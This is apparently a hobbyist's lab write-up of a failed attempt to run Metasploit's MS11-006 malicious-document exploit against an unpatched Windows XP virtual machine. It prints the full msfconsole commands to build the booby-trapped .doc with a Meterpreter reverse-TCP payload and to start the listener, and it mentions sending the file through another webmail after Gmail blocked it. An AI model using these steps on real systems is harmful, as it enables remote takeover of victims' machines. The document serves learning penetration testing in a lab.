I’m following instruction given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).
Details of the target machine on my Virtual Hacking Lab:
Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
Metasploit describe this exploit thus:
This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.
The first step is to create the malicious document within Metasploit:
msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > set outputpath /root/ <– I changed the output directory as the original one didn’t exist.
outputpath => /root/
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.70 <– Attacking machine.
LHOST => 192.168.1.70
msf exploit(ms11_006_createsizeddibsection) > set LPORT 447 <– Attacking machine port.
LPORT => 447
msf exploit(ms11_006_createsizeddibsection) > exploit[*] Creating ‘msf.doc’ file …
[*] Generated output file /root/msf.doc <– File created.
I then emailed as an attachment the created “malicious” file to open on the target Windows machine. I was very impressed with Google Gmail as it rejected the email and noted:
Our system detected an illegal attachment on your message
So, I had to send the file via another web based mail system.
Before opening the file on the target Windows system, I needed to set up the attacking machine to listen for incoming connections from the target machine:
msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(handler) > set LPORT 447
LPORT => 447
msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.70:447
[*] Starting the payload handler…
I then opened the malicious file on the target machine and viewed as a thumbnail in the hope it would trigger the exploit; however, nothing happened, and the hack failed.
Microsoft list the Windows versions affected by this exploit and my x32 XP Pro SP2 is not listed, so perhaps this is the reason the exploit failed. The above book states the Windows system should be SP3, which mine is not.
A little disappointed.
Anyway, here’s a nice step-by-step guide to this exploit.
And this video, may or may not be useful: